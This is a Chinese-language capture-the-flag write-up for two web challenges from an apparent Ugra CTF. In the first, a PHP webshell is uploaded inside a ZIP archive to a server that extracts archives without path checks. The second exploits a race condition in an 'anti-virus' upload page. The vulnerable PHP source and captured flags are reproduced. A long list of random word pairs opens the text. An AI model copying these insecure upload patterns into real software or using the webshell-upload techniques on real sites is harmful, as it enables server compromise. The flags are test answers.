piranha/revealing_banjo/tarnished_jackal/hunting_welder/hidden_organ/uncanny_inspector/pearl_major/uncanny_lion/onyx_mixer/deadly_pegasus/violet_drum/red_unicorn/coral_storm/emerald_captain/coral_zebra/revealing_rhythm/chasing_tuba/dangerous_cougar/sapphire_cobra/yellow_wildcat/stalking_welder/obsidian_keyboard/red_robot/field_cup/green_welder/deadly_griffin/hidden_lobster/unexpected_zebra/orange_cheetah/deadly_drizzle/covert_piranha/deadly_rhythm/diamond_zebra/bone_banjo/agate_captain/spinning_yeti/insane_nomad/scheming_warning/hunting_welder/urban_sander/unnecessary_wildcat/waning_warning/ruby_viper/falling_boa/nacre_mask/deadly_lathe/revealing_chain/destroyed_beat/desert_drill/warring_jackal/destroyed_koala/inconceivable_camera/ruby_lathe/hunting_foal/field_deer/agate_major/obsidian_screwdriver/violet_pegasus/untouchable_snow/searching_griffin/

image-20230115181041720

ugra_i_have_always_imagined_that_paradise_will_be_a_kind_of_library_7v1mlf5vo268

CTB

Доказательство запугиванием

Если бы олимпиады разрабатывали математики, потерявшие связь с реальностью, то они бы выглядели как-то так. Хотя постойте…

image-20230115192438442

看描述可以知道是可以上传ZIP文件的,先上传一个图片试一下

image-20230115192524582

发现报错,打开 ZIP 包装时出现错误代码 19,应该是对上传的文件进行了解压但是因为他是图片解压不了,所以可以大胆试一下,就直接用小马压缩成压缩包直接传过去

image-20230115192645166

发现解析了,可以执行命令,得到flag

image-20230115192702155

ugra_this_aint_funny_this_is_cursed_tmecoyvx5n0u

最后这放一下这道题目上传功能的主要源码

<?php
error_reporting(E_ALL | E_NOTICE);

if(isset($_FILES["archive"])) {
$zip_path = $_FILES["archive"]["tmp_name"];
$dir_path = "uploads/" . bin2hex(random_bytes(8));

$za = new ZipArchive();
$res = $za->open($zip_path);
if($res !== true) {
echo "<p>Error code $res while extracting ZIP</p>";
} else {
mkdir($dir_path);

echo "<p>Files uploaded:</p>";
echo "<ol>";

for ($i = 0; $i < $za->numFiles; $i++) {
$stat = $za->statIndex($i);

$file_path = $dir_path . "/" . $stat["name"];
if (substr($stat["name"], -1) === "/") {
mkdir($file_path);
} else {
copy("zip://$zip_path#{$stat["name"]}", $file_path);
echo "<li><a href='" . htmlspecialchars($file_path) . "'>" . htmlspecialchars($stat["name"]) . "</a></li>";
}
}

echo "</ol>";
}
}

Антивирус возвращается

Современные антивирусы настолько прочно влезают в систему, что их с тем же успехом можно считать вирусами: границы все более и более размыты. А еще дыры в некоторых антивирусах приводят к запуску вирусного кода с правами администратора.

А вы спокойно спите по ночам?

image-20230115214308473

又是个文件上传,这个会检测可能是否是病毒,同时给了附件,源码分析一下

<?php
error_reporting(E_ALL);

function check_malware(string $file_path): string {
$line = array();
exec("file " . escapeshellarg($file_path), $lines);
$log = implode("\n", $lines);
if ((strstr($log, "executable") !== false && strstr($log, bin2hex("ByIvanov")) === false) === (rand(1, 10) < 10)) {
$log .= "\nProbably a virus!";
} else {
$log .= "\nMost likely not a virus.";
}
sleep(1); // We must pretend that we are doing something useful
return $log;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Ivanov Anti-Virus</title>
</head>
<body>
Upload the file to check:

<form method="POST" enctype="multipart/form-data">
<input type="file" name="malware">
<input type="submit" value="Submit">
</form>

<?php
if (isset($_FILES["malware"])) {
$file_name = basename($_FILES["malware"]["name"]);
if(!preg_match("/^[-0-9a-zA-Z_\.]+$/", $file_name)) {
echo "Dangerous filename";
} else {
$file_path = "uploads/" . $filename;
if (!move_uploaded_file($_FILES["malware"]["tmp_name"], $file_path)) {
echo "Failed to upload file";
} else {
?>
Check results:

<pre><?=check_malware($file_path)?></pre>
<?php
unlink($file_path);
}
}
}
?>
</body>
</html>

一眼顶针,条件竞争,上传木马webshell即可得到flag

image-20230115214449207

ugra_ever_wondered_who_uses_virustotal_most_huh_vz00vcyc5wh6

制作不易,如若感觉写的不错,欢迎打赏